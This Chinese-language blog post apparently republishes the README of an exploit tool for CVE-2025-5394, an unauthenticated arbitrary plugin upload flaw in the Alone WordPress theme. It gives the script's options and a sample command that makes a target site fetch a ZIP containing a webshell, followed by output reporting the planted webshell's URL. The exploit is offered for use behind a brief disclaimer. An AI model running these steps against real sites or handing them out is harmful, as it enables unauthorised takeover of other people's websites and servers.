CVE-2025-5394漏洞利用:WordPress Alone主题未授权任意插件上传漏洞分析

本文详细分析了CVE-2025-5394漏洞,该漏洞影响Alone慈善多用途非盈利WordPress主题,允许攻击者未经认证上传任意插件文件,包含漏洞利用脚本的使用方法和示例输出。

🚨 CVE-2025-5394 - Alone主题未授权任意插件上传漏洞

📌 受影响产品:

Alone – 慈善多用途非盈利WordPress主题
受影响版本: 所有版本

🚀 使用示例: 

1

python3 CVE-2025-5394.py -help

1
2
3
4
5
6
7
8

用法:CVE-2025-5394.py [-h] -u URL -s SHELL

CVE-2025-5394漏洞利用 | 作者:Khaled Alenazi (Nxploited)

选项:
  -h, --help         显示帮助信息
  -u, --url URL      目标WordPress站点URL
  -s, --shell SHELL  包含Webshell的ZIP文件URL (.zip)

✅ 成功输出: 

1
2
3
4
5
6
7

python3 CVE-2025-5394.py -u http://target.com/wordpress/ -s http://target.com/shell_plugin.zip
[>] 目标地址     : http://target.com/wordpress
[>] Shell URL     : http://target.com/shell.php
[>] 插件Slug     : shell_plugin
[>] 发送利用载荷...
[+] 利用成功
[+] Webshell URL  : http://target.com/wordpress/wp-content/plugins/shell_plugin/shell_plugin.php

⚠️ 免责声明:

本脚本仅用于教育和研究目的
作者不对使用此代码进行的任何滥用或非法活动负责。
仅限在您拥有或获得明确测试权限的系统上使用。

👨‍💻 作者:

Nxploited (Khaled Alenazi)
GitHub: https://github.com/Nxploited

comments powered by Disqus
© 2020 - 2025 qife
使用 Hugo 构建
主题 StackJimmy 设计
本站总访问量 本站访客数人次